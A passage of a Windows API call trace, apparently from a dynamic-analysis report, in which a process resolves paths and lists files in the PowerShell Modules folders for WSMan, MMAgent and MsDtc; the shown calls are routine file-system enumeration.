ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0264.994] FindClose (in: hFindFile=0x1a8dafc0 | out: hFindFile=0x1a8dafc0) returned 1 [0264.994] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.994] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.994] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management", lpFilePart=0x0) returned 0x4d [0264.994] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0264.994] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.wsman.management"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0264.994] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0264.994] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0264.994] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management", lpFilePart=0x0) returned 0x4d [0264.994] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\", lpFilePart=0x0) returned 0x4e [0264.994] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.995] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.995] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3159a2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3159a2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3159a2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management.psd1", cAlternateFileName="")) returned 1 [0264.995] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3159a2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3159a2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3159a2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management.psd1", cAlternateFileName="")) returned 0 [0264.995] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.995] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0264.995] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0264.995] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.wsman.management\\microsoft.wsman.management.psd1")) returned 0x20 [0264.996] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.996] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent", lpFilePart=0x0) returned 0x3a [0264.996] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\", lpFilePart=0x0) returned 0x3b [0264.996] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.996] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.996] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f14b8c7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f14b8c7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f14b8c7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMAgent.psd1", cAlternateFileName="")) returned 1 [0264.997] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f125661, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f125661, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f125661, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="ps_mmagent_v1.0.cdxml", cAlternateFileName="")) returned 1 [0264.997] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f125661, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f125661, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f125661, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="ps_mmagent_v1.0.cdxml", cAlternateFileName="")) returned 0 [0264.997] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.997] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.997] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.997] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.997] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent", lpFilePart=0x0) returned 0x3a [0264.997] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\", lpFilePart=0x0) returned 0x3b [0264.997] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.997] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.998] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f14b8c7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f14b8c7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f14b8c7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMAgent.psd1", cAlternateFileName="")) returned 1 [0264.998] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f125661, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f125661, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f125661, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="ps_mmagent_v1.0.cdxml", cAlternateFileName="")) returned 1 [0264.998] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0264.998] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.998] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.998] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.998] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent", lpFilePart=0x0) returned 0x3a [0264.998] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0264.998] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\mmagent"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0264.998] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0264.998] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0264.999] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent", lpFilePart=0x0) returned 0x3a [0264.999] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\", lpFilePart=0x0) returned 0x3b [0264.999] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.999] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.999] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f14b8c7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f14b8c7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f14b8c7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMAgent.psd1", cAlternateFileName="")) returned 1 [0265.000] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f125661, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f125661, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f125661, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="ps_mmagent_v1.0.cdxml", cAlternateFileName="")) returned 1 [0265.000] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f125661, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f125661, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f125661, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="ps_mmagent_v1.0.cdxml", cAlternateFileName="")) returned 0 [0265.000] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.000] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0265.000] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0265.000] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\MMAgent.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\mmagent\\mmagent.psd1")) returned 0x20 [0265.000] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0265.000] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc", lpFilePart=0x0) returned 0x38 [0265.000] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\", lpFilePart=0x0) returned 0x39 [0265.000] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.001] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.001] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8fadd5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0265.001] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8fadd5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0265.001] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1961, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc.Formats.ps1xml", cAlternateFileName="")) returned 1 [0265.002] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a48d09b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1006, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc.psd1", cAlternateFileName="")) returned 1 [0265.002] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x843, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc.Types.ps1xml", cAlternateFileName="")) returned 1 [0265.002] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcAdvancedHostSettingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0265.002] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xef8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcAdvancedSettingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0265.002] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x635, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcClusterDefaultTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0265.002] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a48d09b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3ae0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcClusterTMMappingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0265.003] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a48d09b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x60f, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcDefaultTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0265.003] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe44, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcLogTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0265.003] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, 